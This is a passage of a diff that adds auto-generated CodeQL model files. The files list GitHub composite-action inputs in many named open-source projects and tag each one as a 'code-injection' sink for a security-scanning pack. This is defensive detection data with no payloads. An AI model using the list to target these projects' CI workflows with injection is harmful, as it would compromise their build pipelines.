["saltstack/salt", "*", "inputs.lookup-only", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.fail-on-cache-miss", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.enableCrossOsArchive", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.key", "code-injection", "generated"] + - ["saltstack/salt", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml new file mode 100644 index 00000000000..535e832c1c3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sap/sapmachine", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml new file mode 100644 index 00000000000..e1902fb488f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["scala-native/scala-native", "*", "inputs.llvm-version", "code-injection", "generated"] + - ["scala-native/scala-native", "*", "inputs.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml new file mode 100644 index 00000000000..2ede3df9864 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["scitools/iris", "*", "inputs.version", "code-injection", "generated"] + - ["scitools/iris", "*", "inputs.install_packages", "code-injection", "generated"] + - ["scitools/iris", "*", "inputs.env_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml new file mode 100644 index 00000000000..1bea0aef935 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["scylladb/scylla-operator", "*", "inputs.containerImageName", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "inputs.githubToken", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "inputs.githubRef", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "inputs.githubRepository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml new file mode 100644 index 00000000000..4a8bae9d2a1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shader-slang/slang", "*", "inputs.platform", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.os", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.runs-on", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.config", "code-injection", "generated"] + - ["shader-slang/slang", "*", "inputs.compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml new file mode 100644 index 00000000000..c63ed017ae1 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shaka-project/shaka-player", "*", "inputs.state", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "inputs.context", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "inputs.job_name", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "inputs.token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml new file mode 100644 index 00000000000..544fc4b9951 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.org", "code-injection", "generated"] + - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.app_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml new file mode 100644 index 00000000000..2d3871a2231 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["simple-icons/simple-icons", "*", "inputs.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml new file mode 100644 index 00000000000..4f18723df38 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["slint-ui/slint", "*", "inputs.extra-packages", "code-injection", "generated"] + - ["slint-ui/slint", "*", "inputs.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml new file mode 100644 index 00000000000..a96d86c7b5c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["solidusio/solidus", "*", "inputs.last_minor", "code-injection", "generated"] + - ["solidusio/solidus", "*", "inputs.labels", "code-injection", "generated"] + - ["solidusio/solidus", "*", "inputs.base", "code-injection", "generated"] + - ["solidusio/solidus", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml new file mode 100644 index 00000000000..ff1b101be4a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["solo-io/gloo", "*", "inputs.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml new file mode 100644 index 00000000000..fb7bdd0950e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sonarr/sonarr", "*", "inputs.filter", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.binary_path", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.artifact", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.major_version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.branch", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "inputs.framework", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml new file mode 100644 index 00000000000..9b263d03357 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sonic-pi-net/sonic-pi", "*", "inputs.command", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "inputs.container-version", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "inputs.container", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml new file mode 100644 index 00000000000..5e6e66c4be4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spacedriveapp/spacedrive", "*", "inputs.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml new file mode 100644 index 00000000000..cf545a95592 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spockframework/spock", "*", "inputs.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml new file mode 100644 index 00000000000..0484e903515 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-io/initializr", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-io/initializr", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml new file mode 100644 index 00000000000..756a1a0371a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-io/start.spring.io", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-io/start.spring.io", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml new file mode 100644 index 00000000000..ed954bf6f97 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-projects/spring-boot", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-projects/spring-boot", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml new file mode 100644 index 00000000000..47aebb45825 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-projects/spring-framework", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-projects/spring-framework", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml new file mode 100644 index 00000000000..28935d7a98b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["spring-projects/spring-graphql", "*", "inputs.run-name", "code-injection", "generated"] + - ["spring-projects/spring-graphql", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml new file mode 100644 index 00000000000..2ba9ff355e2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["square/workflow-kotlin", "*", "inputs.commit-message", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "inputs.fix-task", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "inputs.personal-access-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml new file mode 100644 index 00000000000..530cc68ca4b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stefanprodan/podinfo", "*", "inputs.version", "code-injection", "generated"] + - ["stefanprodan/podinfo", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml new file mode 100644 index 00000000000..e75197656f5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["stellar/go", "*", "inputs.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml new file mode 100644 index 00000000000..b56944cd0ff --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml new file mode 100644 index 00000000000..e6d2a79b847 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["subquery/subql", "*", "inputs.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml new file mode 100644 index 00000000000..ffd74df05e2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["swagger-api/swagger-codegen", "*", "inputs.options", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.spec-url", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.language", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.job-name", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.build-commands", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml new file mode 100644 index 00000000000..f476d7160f6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["swagger-api/swagger-parser", "*", "inputs.logsPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.parserSpecPath", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.serializationType", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.options", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.inputSpec", "code-injection", "generated"] + - ["swagger-api/swagger-parser", "*", "inputs.parserVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml new file mode 100644 index 00000000000..e95dacb65a9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tarantool/tarantool", "*", "inputs.source", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "inputs.chat-id", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "inputs.revision", "code-injection", "generated"] + - ["tarantool/tarantool", "*", "inputs.submodule", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml new file mode 100644 index 00000000000..42a9859aa23 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["telepresenceio/telepresence", "*", "inputs.release_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml new file mode 100644 index 00000000000..029e4f95a2a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tensorflow/datasets", "*", "inputs.extras", "code-injection", "generated"] + - ["tensorflow/datasets", "*", "inputs.tf-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml new file mode 100644 index 00000000000..3223e185c7b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["texstudio-org/texstudio", "*", "inputs.file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml new file mode 100644 index 00000000000..26fa1ce22b7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["toeverything/affine", "*", "inputs.extra-flags", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.nmHoistingLimits", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.path", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.cluster-location", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.cluster-name", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.gcp-project-id", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.package", "code-injection", "generated"] + - ["toeverything/affine", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml new file mode 100644 index 00000000000..a68a3372089 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["treeverse/lakefs", "*", "inputs.compose-flags", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "inputs.compose-directory", "code-injection", "generated"] + - ["treeverse/lakefs", "*", "inputs.compose-file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml new file mode 100644 index 00000000000..6c874d64655 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["trezor/trezor-firmware", "*", "inputs.lang", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "inputs.model", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "inputs.status", "code-injection", "generated"] + - ["trezor/trezor-firmware", "*", "inputs.full-deps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml new file mode 100644 index 00000000000..8d339364cf3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["tribler/tribler", "*", "inputs.libsodium-version", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.command", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.duration", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.requirements", "code-injection", "generated"] + - ["tribler/tribler", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml new file mode 100644 index 00000000000..db6751f8ef5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["trunk-io/trunk-action", "*", "inputs.tools", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.post-init", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.setup-deps", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.label", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.debug", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.check-run-id", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.check-all-mode", "code-injection", "generated"] + - ["trunk-io/trunk-action", "*", "inputs.cache-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml new file mode 100644 index 00000000000..68959bf2102 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["unidata/metpy", "*", "inputs.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml new file mode 100644 index 00000000000..f8aa8480088 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["unstructured-io/unstructured", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml new file mode 100644 index 00000000000..0f78fddcd96 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vercel/turbo", "*", "inputs.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml new file mode 100644 index 00000000000..9eb860b13d9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vesoft-inc/nebula", "*", "inputs.target-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.bucket", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.key-secret", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.key-id", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.endpoint", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.asset-path", "code-injection", "generated"] + - ["vesoft-inc/nebula", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml new file mode 100644 index 00000000000..573b256121f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vkcom/vkui", "*", "inputs.next_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.package_name", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.npm_tag", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.prev_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.new_version", "code-injection", "generated"] + - ["vkcom/vkui", "*", "inputs.pre_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml new file mode 100644 index 00000000000..c5278340c0b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["vuetifyjs/vuetify", "*", "inputs.name", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "inputs.path", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "inputs.npm-tag", "code-injection", "generated"] + - ["vuetifyjs/vuetify", "*", "inputs.release-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml new file mode 100644 index 00000000000..b11973cfa00 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wagoodman/dive", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml new file mode 100644 index 00000000000..1fd3ca1f005 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["walletconnect/walletconnectswiftv2", "*", "inputs.js-client-api-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.relay-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-host", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-secret", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.gm-dapp-project-id", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.explorer-endpoint", "code-injection", "generated"] + - ["walletconnect/walletconnectswiftv2", "*", "inputs.notify-endpoint", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml new file mode 100644 index 00000000000..727a21ac960 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["wazuh/wazuh", "*", "inputs.target", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "inputs.doxygen_config", "code-injection", "generated"] + - ["wazuh/wazuh", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git 